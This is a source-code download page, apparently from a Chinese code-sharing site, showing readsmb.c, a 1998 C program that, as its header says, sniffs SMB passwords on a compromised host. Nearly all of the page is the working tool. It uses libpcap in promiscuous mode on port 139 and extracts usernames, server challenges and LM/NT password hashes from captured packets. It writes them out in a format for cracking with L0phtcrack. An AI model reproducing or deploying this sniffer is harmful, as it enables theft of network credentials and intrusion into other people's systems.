开通博客赚积分
发布资源赚积分
分类

源码开发语言/平台
当前位置:首页 > 源码/资料 > Internet/网络编程 > 查看源码
readsmb.c
资源名称:readsmb.zip [点击查看]
上传用户:qinke188
上传日期:2007-01-05
资源大小:4k
文件大小:10k
源码类别:

Internet/网络编程

开发平台:

WINDOWS

readsmb.c:源码内容
  2. /* http://www.cotse.com  Fear the swimming Elephant! */
  4. /* readsmb.c v0.56
  5.  * by the basement research <basementresearch@hotmail.com> 5/29/98
  6.  *
  7.  * Many thanks to L0pht Heavy Industries - without L0phtcrack this is worthless.
  8.  * 
  9.  * An implementation of the SMB sniffer that comes with l0phtcrack 2.0.  The 
  10.  * purpose here is to provide an effective means of sniffing SMB passwords on 
  11.  * a compromised host. Its too hard to execute a sniffer on a remote host with 
  12.  * only an NT version available. 
  13.  * 
  14.  * If you don't have libpcap, you'll need to get it - its at ftp.ee.lbl.gov.
  15.  * (Has there ever been a more useful government service than this?)
  16.  * Tested on Linux 2.0.x (glibc1 and 2), and FreeBSD.  It will compile on 
  17.  * Slow-aris, but it is totally untested (there will be a byte-ordering issue). 
  18.  * 
  19.  * This is pretty crude but functional.  I still don't even know what the second
  20.  * field of the sniff file is for (the program simply inserts a '3').  I tested 
  21.  * this with Win95, WinNT, and Samba clients (both smbclient LANMAN2 and NT1).  
  22.  * I don't think it grabs the correct string for Administrator, because LC 
  23.  * couldn't crack it (sometimes the real readsmb didn't seem to get it either 
  24.  * - and sometimes it seemed to drop the username.  readsmb also didn't seem 
  25.  * to always work for LANMAN2 protocol, this does).   
  26.  *
  27.  * The start_pcap() function was taken from "UNIX Network Programming - 
  28.  * Networking APIs : Sockets and XTI" by Richard Stevens (great book.) 
  29.  *
  30.  * Officially dedicated to Nikki Steele. 
  31.  *
  32.  * Fbhepr pbqr vf fcrrpu!
  33.  *                                                    jose chung
  34.  *                                                    the basement research
  35.  *
  36.  * To compile :
  37.  * cc -o readsmb readsmb.c -lpcap
  38.  * Usage :
  39.  * ./readsmb [output file] (otherwise to stdout)
  40.  */
  42. #include <stdio.h>
  43. #include <string.h>
  44. #include <unistd.h>
  45. #include <sys/signal.h>
  46. #ifdef __FreeBSD__
  47. #include <sys/socket.h>
  48. #endif /* __FreeBSD__ */
  49. #ifdef __sun /* Solaris 2.x */
  50. #define u_int32_t uint32_t
  51. #include <sys/socket.h>
  52. #endif /* Not FreeBSD, not Solaris.  Our default is Linux */
  53. #include <net/if.h>
  54. #include "pcap.h"
  56. #define FILTER_CMD      "src port 139 or dst port 139"
  57. #define TRUE    (1)
  59. #define LM_PROT         0x0D
  60. #define NT_PROT         0x11
  62. #define SMB_SK_COMMAND  0x72
  63. #define SMB_PW_COMMAND  0x73
  64. #define TIMEOUT_VALUE   500
  66. #define PW_OFFSET_NT12  105
  67. #define PWNT_OFFSET_NT12        129
  68. #define SK_OFFSET_NT12  112
  69. #define USER_OFFSET_NT12        129
  71. #define PWNT_OFFSET_LM2 75
  72. #define PW_OFFSET_LM2   99
  73. #define SK_OFFSET_LM2   104
  74. #define USER_OFFSET_LM2 123
  76. #define SMB_PORT        139
  78. FILE *log = NULL;
  79. char *device;
  80. struct pcap_pkthdr hdr;
  81. pcap_t *pfd; /* File descriptor for pcap */
  82. u_short link_offset = 0; /* 0 if device = ppp0, 14 if device = eth0 */
  83. int current_pkt_type = 0;
  84. int neg_prot, pw_offset, sk_offset, user_offset;
  86. void *
  87. killed (int sig)
  88. {
  89.   fflush (log);
  90.   if (log != NULL)
  91.     fclose (log);
  92.   exit (0);
  93. }
  95. char *
  96. check_pkt (char *pkt)
  97. {
  98.   static u_short port;
  99.   static u_char cmd;
  100.   char *extracted;
  101.   char *discard = NULL;
  102.   u_short *port_ext;
  104.   if ((extracted = (char *) malloc (sizeof (char))) == NULL)
  105.     {
  106.       puts ("Error allocating memory.");
  107.       exit (0);
  108.     }
  109.   if ((port_ext = (u_short *) malloc (sizeof (u_short))) == NULL)
  110.     {
  111.       puts ("Error allocating memory.");
  112.       exit (0);
  113.     }
  114.   memcpy (extracted, (pkt + 48), sizeof (u_char));
  115.   memcpy (port_ext, (u_short *) (pkt + 20), sizeof (u_short));
  116.   port = ntohs (*((u_short *) port_ext));
  117.   cmd = *((u_char *) extracted);
  118.   if (current_pkt_type == SMB_PW_COMMAND && (((int) cmd == SMB_PW_COMMAND) && (!(port == SMB_PORT))))
  119.     {
  120.       free (extracted);
  121.       free (port_ext);
  122.       return (pkt);
  123.     }
  124.   if (current_pkt_type == SMB_SK_COMMAND && (((int) cmd == SMB_SK_COMMAND) && (port == SMB_PORT)))
  125.     {
  126.       free (extracted);
  127.       free (port_ext);
  128.       return (pkt);
  129.     }
  130.   free (extracted);
  131.   free (port_ext);
  132.   return (discard);
  133. }
  135. char *
  136. grab_pcap ()
  137. {
  138.   char *pptr = NULL;
  139.   char *checked_pptr;
  141.   while ((pptr = (char *) pcap_next (pfd, &hdr)) == NULL);
  142.   pptr = pptr + link_offset;
  143.   checked_pptr = check_pkt (pptr);
  144.   return (checked_pptr);
  145. }
  147. char *
  148. grabber_loop ()
  149. {
  150.   char *grabbed_pkt = NULL;
  152.   while (grabbed_pkt == NULL)
  153.     {
  154.       grabbed_pkt = grab_pcap ();
  155.     }
  156.   return (grabbed_pkt);
  157. }
  159. void
  160. start_pcap ()
  161. {
  163.   char cmd[80];
  164.   int psize, datalink;
  165.   struct bpf_program fcode;
  166.   u_int localnet, netmask;
  167.   char errbuf[PCAP_ERRBUF_SIZE];
  168.   char link[] = "ppp0";
  170.   psize = 300; /* I'm not even sure what this does.   Did this come from Stevens too? */
  172.   if ((device = pcap_lookupdev (errbuf)) == NULL)
  173.     {
  174.       printf ("pcap_lookupdev : %sn", errbuf);
  175.       exit (-1);
  176.     }
  177.   if (strcmp (device, link) == 0)
  178.     {
  179.       link_offset = 0;
  180.     }
  181.   else
  182.     link_offset = 14;
  183.   printf ("Selected network device %sn", device);
  184.   if ((pfd = pcap_open_live (device, psize, IFF_PROMISC, TIMEOUT_VALUE, errbuf))
  185.       == NULL)
  186.     {
  187.       printf ("pcap_open_live : %sn", errbuf);
  188.       exit (-1);
  189.     }
  190.   puts ("Opened device successfully.");
  191.   if (pcap_lookupnet (device, &localnet, &netmask, errbuf) < 0)
  192.     {
  193.       printf ("pcap_lookupnet : %sn", errbuf);
  194.       exit (-1);
  195.     }
  196.   snprintf (cmd, sizeof (cmd), FILTER_CMD);
  197.   printf ("Applying filter : %sn", &cmd);
  198.   if (pcap_compile (pfd, &fcode, cmd, IFF_PROMISC, netmask) < 0)
  199.     {
  200.       printf ("pcap_compile : %sn", pcap_geterr (pfd));
  201.       exit (-1);
  202.     }
  203.   if (pcap_setfilter (pfd, &fcode) < 0)
  204.     {
  205.       printf ("pcap_setfilter : %sn", pcap_geterr (pfd));
  206.       exit (-1);
  207.     }
  208.   if ((datalink = pcap_datalink (pfd)) < 0)
  209.     {
  210.       printf ("pcap_datalink : %sn", pcap_geterr (pfd));
  211.       exit (-1);
  213.     }
  214.   printf ("The datalink is type %dn", datalink);
  215. }
  217. char *
  218. byte_convert_sk (char *pkt)
  219. {
  220.   char *pc1, *pc2, *pc3;
  221.   u_long num1, num2, num3;
  222.   char *converted;
  224.   pc1 = (char *) malloc (sizeof (int));
  225.   pc2 = (char *) malloc (sizeof (int));
  226.   pc3 = (char *) malloc (sizeof (int));
  227.   converted = (char *) malloc (17);
  228.   bzero (converted, 17);
  229.   neg_prot = get_prot (pkt); /* This doesn't belong here. */
  230.   if (neg_prot == LM_PROT)
  231.     {
  232.       pw_offset = PW_OFFSET_LM2;
  233.       sk_offset = SK_OFFSET_LM2;
  234.       user_offset = USER_OFFSET_LM2;
  235.     }
  236.   if (neg_prot == NT_PROT)
  237.     {
  238.       pw_offset = PW_OFFSET_NT12;
  239.       sk_offset = SK_OFFSET_NT12;
  240.       user_offset = USER_OFFSET_NT12;
  241.     }
  242.   memcpy (pc1, (pkt + sk_offset), sizeof (int));
  243.   memcpy (pc2, (pkt + (sk_offset + 4)), sizeof (int));
  244.   memcpy (pc3, (pkt + (sk_offset + 8)), sizeof (int));
  245.   num1 = ntohl (*((u_long *) pc1));
  246.   num2 = ntohl (*((u_long *) pc2));
  247.   num3 = (u_long) ntohl (*((u_long *) pc3));
  248.   num1 = (num1 << 8) >> 8;
  249.   num3 = num3 >> 24;
  250.   sprintf (converted, "%.6x%.8x%.2x", num1, num2, num3);
  251.   free (pc1);
  252.   free (pc2);
  253.   free (pc3);
  254.   return (converted);
  255. }
  257. int
  258. get_prot (char *pkt)
  259. {
  260.   u_char *prot_code;
  261.   int code = 0;
  263.   prot_code = (u_char *) malloc (sizeof (u_char));
  264.   memcpy (prot_code, (pkt + 76), 1);
  265.   code = (int) *prot_code;
  266.   return (code);
  267. }
  270. char *
  271. byte_convert_user (char *pkt)
  272. {
  273.   char *pc1;
  275.   pc1 = (char *) malloc (49);
  276.   bzero (pc1, 49);
  277.   strcpy (pc1, (pkt + user_offset));
  278.   return (pc1);
  279. }
  281. char *
  282. byte_convert_pw (char *pkt, int run)
  283. {
  284.   char *lmhash;
  285.   char *pc1, *pc2, *pc3, *pc4, *pc5, *pc6;
  286.   u_int num1, num2, num3, num4, num5, num6;
  288.   lmhash = (char *) malloc (49);
  289.   bzero (lmhash, 49);
  290.   if ((run == 2) && (neg_prot == NT_PROT))
  291.     {
  292.       pw_offset = PWNT_OFFSET_NT12;
  293.     }
  294.   if ((run == 2) && (neg_prot == LM_PROT))
  295.     {
  296.       pw_offset = PWNT_OFFSET_LM2;
  297.     }
  298.   pc1 = (char *) malloc (sizeof (u_int));
  299.   pc2 = (char *) malloc (sizeof (u_int));
  300.   pc3 = (char *) malloc (sizeof (u_int));
  301.   pc4 = (char *) malloc (sizeof (u_int));
  302.   pc5 = (char *) malloc (sizeof (u_int));
  303.   pc6 = (char *) malloc (sizeof (u_int));
  304.   memcpy (pc1, (pkt + pw_offset), 4);
  305.   memcpy (pc2, (pkt + (pw_offset + 4)), 4);
  306.   memcpy (pc3, (pkt + (pw_offset + 8)), 4);
  307.   memcpy (pc4, (pkt + (pw_offset + 12)), 4);
  308.   memcpy (pc5, (pkt + (pw_offset + 16)), 4);
  309.   memcpy (pc6, (pkt + (pw_offset + 20)), 4);
  310.   num1 = ntohl (*((u_int *) pc1));
  311.   num2 = ntohl (*((u_int *) pc2));
  312.   num3 = ntohl (*((u_int *) pc3));
  313.   num4 = ntohl (*((u_int *) pc4));
  314.   num5 = ntohl (*((u_int *) pc5));
  315.   num6 = ntohl (*((u_int *) pc6));
  316.   sprintf (lmhash, "%.8x%.8x%.8x%.8x%.8x%.8x", num1, num2, num3, num4, num5, num6);
  317.   free (pc1);
  318.   free (pc2);
  319.   free (pc3);
  320.   free (pc4);
  321.   free (pc5);
  322.   free (pc6);
  323.   return (lmhash);
  324. }
  326. void
  327. main (int argc, char **argv)
  328. {
  329.   char *cur_pkt, *next_pkt;
  330.   char *sk, *user, *pw, *ntpw, *output;
  332.   signal (SIGINT, killed);
  333.   signal (SIGTERM, killed);
  334.   signal (SIGKILL, killed);
  335.   signal (SIGQUIT, killed);
  337.   if (argc > 2)
  338.     {
  339.       printf ("Usage : %s [output file]n", *argv);
  340.       exit (0);
  341.     }
  342.   if (argc == 1)
  343.     {
  344.       log = stdout;
  345.     }
  346.   else
  347.     log = fopen (argv[1], "w");
  349.   if ((argc == 2) && (!log))
  350.     {
  351.       puts ("Error opening logfile.");
  352.       exit (0);
  353.     }
  354.   start_pcap ();
  355.   while TRUE
  356.     {
  357.       output = (char *) malloc (172);
  358.       bzero (output, 172);
  359.       current_pkt_type = SMB_SK_COMMAND;
  360.       cur_pkt = grabber_loop ();
  361.       sk = byte_convert_sk (cur_pkt);
  362.       current_pkt_type = SMB_PW_COMMAND;
  363.       next_pkt = grabber_loop ();
  364.       user = byte_convert_user (next_pkt);
  365.       pw = byte_convert_pw (next_pkt, 1);
  366.       ntpw = byte_convert_pw (next_pkt, 2);
  367.       strcat (output, user);
  368.       strncat (output, ":3:", 3);
  369.       strcat (output, sk);
  370.       strncat (output, ":", 1);
  371.       strcat (output, pw);
  372.       strncat (output, ":", 1);
  373.       strcat (output, ntpw);
  374.       fprintf (log, "%#sn", output);
  375.       fflush (log);
  376.       free (output);
  377.     }
  378. }